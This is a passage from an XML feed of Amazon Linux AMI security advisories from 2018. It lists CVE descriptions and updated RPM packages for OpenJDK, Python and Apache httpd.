Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162 and 10; Java SE Embedded: 8u161. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N).
1568515:
CVE-2018-2790 OpenJDK: incorrect merging of sections in the JAR manifest (Security, 8189969)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2790" title="" id="CVE-2018-2790" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2794" title="" id="CVE-2018-2794" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2795" title="" id="CVE-2018-2795" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2796" title="" id="CVE-2018-2796" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2797" title="" id="CVE-2018-2797" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2798" title="" id="CVE-2018-2798" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2799" title="" id="CVE-2018-2799" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2800" title="" id="CVE-2018-2800" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2814" title="" id="CVE-2018-2814" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2815" title="" id="CVE-2018-2815" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-devel" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.171-7.b10.37.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.171-7.b10.37.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.171-7.b10.37.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.171-7.b10.37.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.171-7.b10.37.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.171-7.b10.37.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.171-7.b10.37.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.171-7.b10.37.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.171-7.b10.37.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.171-7.b10.37.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.171-7.b10.37.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.171-7.b10.37.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.171-7.b10.37.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.171" release="7.b10.37.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.171-7.b10.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1003</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1003: medium priority package update for python34 python35 python36 python27</title><issued date="2018-04-26 17:28:00" /><updated date="2018-05-03 22:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1061:
A flaw was found in the way catastrophic backtracking was implemented in python&#039;s difflib.IS_LINE_JUNK method. An attacker could use this flaw to cause denial of service.
1549192:
CVE-2018-1061 python: DOS via regular expression backtracking in difflib.IS_LINE_JUNK method in difflib
CVE-2018-1060:
A flaw was found in the way catastrophic backtracking was implemented in python&#039;s pop3lib&#039;s apop() method. An attacker could use this flaw to cause denial of service.
1549191:
CVE-2018-1060 python: DOS via regular expression catastrophic backtracking in apop() method in pop3lib
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1060" title="" id="CVE-2018-1060" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1061" title="" id="CVE-2018-1061" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python34-tools" version="3.4.8" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.8-1.39.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.8" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.8-1.39.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.8" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.8-1.39.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.8" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.8-1.39.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.8" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.8-1.39.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.8" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.8-1.39.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.8" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.8-1.39.amzn1.i686.rpm</filename></package><package name="python34-devel" version="3.4.8" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.8-1.39.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.8" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.8-1.39.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.8" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.8-1.39.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.8" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.8-1.39.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.8" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.8-1.39.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.5" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.5-1.12.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.5" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.5-1.12.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.5" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.5-1.12.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.5" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.5-1.12.amzn1.x86_64.rpm</filename></package><package name="python35-libs" version="3.5.5" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.5-1.12.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.5" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.5-1.12.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.5" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.5-1.12.amzn1.i686.rpm</filename></package><package name="python35-test" version="3.5.5" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.5-1.12.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.5" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/python35-devel-3.5.5-1.12.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.5" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.5-1.12.amzn1.i686.rpm</filename></package><package name="python35-debuginfo" version="3.5.5" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.5-1.12.amzn1.i686.rpm</filename></package><package name="python35-libs" version="3.5.5" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.5-1.12.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python36-test" version="3.6.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python36" version="3.6.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.5-1.9.amzn1.i686.rpm</filename></package><package name="python36-debug" version="3.6.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debug-3.6.5-1.9.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python36-test-3.6.5-1.9.amzn1.i686.rpm</filename></package><package name="python36-debuginfo" version="3.6.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.5-1.9.amzn1.i686.rpm</filename></package><package name="python36-libs" version="3.6.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python36-libs-3.6.5-1.9.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.5-1.9.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.5-1.9.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.14" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.14-1.123.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.14" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.14-1.123.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.14" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.14-1.123.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.14" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.14-1.123.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.14" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.14-1.123.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.14" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.14-1.123.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.14" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.14-1.123.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.14" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.14-1.123.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.14" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.14-1.123.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.14" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.14-1.123.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.14" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.14-1.123.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.14" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.14-1.123.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1004</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1004: medium priority package update for httpd24</title><issued date="2018-05-03 16:29:00" /><updated date="2018-05-03 22:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1312:
In Apache httpd 2.2.0 to 2.4.29, when generating an HTTP Digest authentication challenge, the nonce sent to prevent reply attacks was not correctly generated using a pseudo-random seed. In a cluster of servers using a common Digest authentication configuration, HTTP requests could be replayed across servers by an attacker without detection.
1560634:
CVE-2018-1312 httpd: Weak Digest auth nonce generation in mod_auth_digest
CVE-2018-1303:
A specially crafted HTTP request header could have crashed the Apache HTTP Server prior to version 2.4.30 due to an out of bound read while preparing data to be cached in shared memory. It could be used as a Denial of Service attack against users of mod_cache_socache. The vulnerability is considered as low risk since mod_cache_socache is not widely used, mod_cache_disk is not concerned by this vulnerability.
1560399:
CVE-2018-1303 httpd: Out of bounds read in mod_cache_socache can allow a remote attacker to cause a denial of service
CVE-2018-1302:
When an HTTP/2 stream was destroyed after being handled, the Apache HTTP Server prior to version 2.4.30 could have written a NULL pointer potentially to an already freed memory. The memory pools maintained by the server make this vulnerability hard to trigger in usual configurations, the reporter and the team could not reproduce it outside debug builds, so it is classified as low risk.
1560625:
CVE-2018-1302 httpd: Use-after-free on HTTP/2 stream shutdown
CVE-2018-1301:
A specially crafted request could have crashed the Apache HTTP Server prior to version 2.4.30, due to an out of bound access after a size limit is reached by reading the HTTP header. This vulnerability is considered very hard if not impossible to trigger in non-debug mode (both log and build level), so it is classified as low risk for common server usage.
1560643:
CVE-2018-1301 httpd: Out of bound access after failure in reading the HTTP request
CVE-2018-1283:
It has been discovered that the mod_session module of Apache HTTP Server (httpd), through version 2.4.29, has an improper input validation flaw in the way it handles HTTP session headers in some configurations. A remote attacker may influence their content by using a &quot;Session&quot; header.
1560395:
CVE-2018-1283 httpd: Improper handling of headers in mod_session can allow a remote user to modify session data for CGI applications
CVE-2017-15715:
In Apache httpd 2.4.0 to 2.4.29, the expression specified in &lt;FilesMatch&gt; could match &#039;$&#039; to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are are externally blocked, but only by matching the trailing portion of the filename.
1560614:
CVE-2017-15715 httpd:
bypass with a trailing newline in the file name
CVE-2017-15710:
In Apache httpd 2.0.23 to 2.0.65, 2.2.0 to 2.2.34, and 2.4.0 to 2.4.29, mod_authnz_ldap, if configured with AuthLDAPCharsetConfig, uses the Accept-Language header value to lookup the right charset encoding when verifying the user&#039;s credentials. If the header value is not present in the charset conversion table, a fallback mechanism is used to truncate it to a two characters value to allow a quick retry (for example, &#039;en-US&#039; is truncated to &#039;en&#039;). A header value of less than two characters forces an out of bound write of one NUL byte to a memory location that is not part of the string. In the worst case, quite unlikely, the process would crash which could be used as a Denial of Service attack. In the more likely case, this memory is already reserved for future use and the issue has no effect at all.
1560599:
CVE-2017-15710 httpd: Out of bound write in mod_authnz_ldap when using too small Accept-Language values
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15710" title="" id="CVE-2017-15710" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15715" title="" id="CVE-2017-15715" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1283" title="" id="CVE-2018-1283" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1301" title="" id="CVE-2018-1301" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1302" title="" id="CVE-2018-1302" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1303" title="" id="CVE-2018-1303" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1312" title="" id="CVE-2018-1312" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24-manual" version="2.4.33" release="2.78.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.33-2.78.amzn1.noarch.rpm</filename></package><package name="httpd24-devel" version="2.4.33" release="2.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.33-2.78.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.33" release="2.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.33-2.78.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.33" release="2.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.33-2.78.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.33" release="2.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.33-2.78.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.33" release="2.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.33-2.78.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.33" release="2.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.33-2.78.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.33" release="2.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.33-2.78.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.33" release="2.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.33-2.78.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.33" release="2.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.33-2.78.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.33" release="2.78.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.33-2.78.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.33" release="2.78.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.33-2.78.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.33" release="2.78.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.33-2.78.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.33" release="2.78.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.33-2.78.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.33" release="2.78.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.33-2.78.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.33" release="2.78.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.33-2.78.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.33" release="2.78.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.33-2.78.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.33" release="2.78.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.33-2.78.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.33" release="2.78.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.33-2.78.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1007</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1007: critical priority package update for java-1.7.0-openjdk</title><issued date="2018-05-10 16:50:00" /><updated date="2018-05-10 23:28:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-2815:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1567537:
CVE-2018-2815 OpenJDK: unbounded memory allocation during deserialization in StubIORImpl (Serialization, 8192757)
CVE-2018-2814:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Hotspot). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162 and 10; Java SE Embedded: 8u161. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
1567121:
CVE-2018-2814 OpenJDK: incorrect handling of Reference clones can lead to sandbox bypass (Hotspot, 8192025)
CVE-2018-2800:
Vulnerability in the Java SE, JRockit component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 6u181, 7u171 and 8u162; JRockit: R28.3.17. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, JRockit. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, JRockit accessible data as well as unauthorized read access to a subset of Java SE, JRockit accessible data. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.0 Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N).
1568163:
CVE-2018-2800 OpenJDK: RMI HTTP transport enabled by default (RMI, 8193833)
CVE-2018-2799:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JAXP). Supported versions that are affected are Java SE: 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1567542:
CVE-2018-2799 OpenJDK: unbounded memory allocation during deserialization in NamedNodeMapImpl (JAXP, 8189993)
CVE-2018-2798:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: AWT). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1567543:
CVE-2018-2798 OpenJDK: unbounded memory allocation during deserialization in Container (AWT, 8189989)
CVE-2018-2797:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JMX). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1567545:
CVE-2018-2797 OpenJDK: unbounded memory allocation during deserialization in TabularDataSupport (JMX, 8189985)
CVE-2018-2796:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Concurrency). Supported versions that are affected are Java SE: 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1567546:
CVE-2018-2796 OpenJDK: unbounded memory allocation during deserialization in PriorityBlockingQueue (Concurrency, 8189981)
CVE-2018-2795:
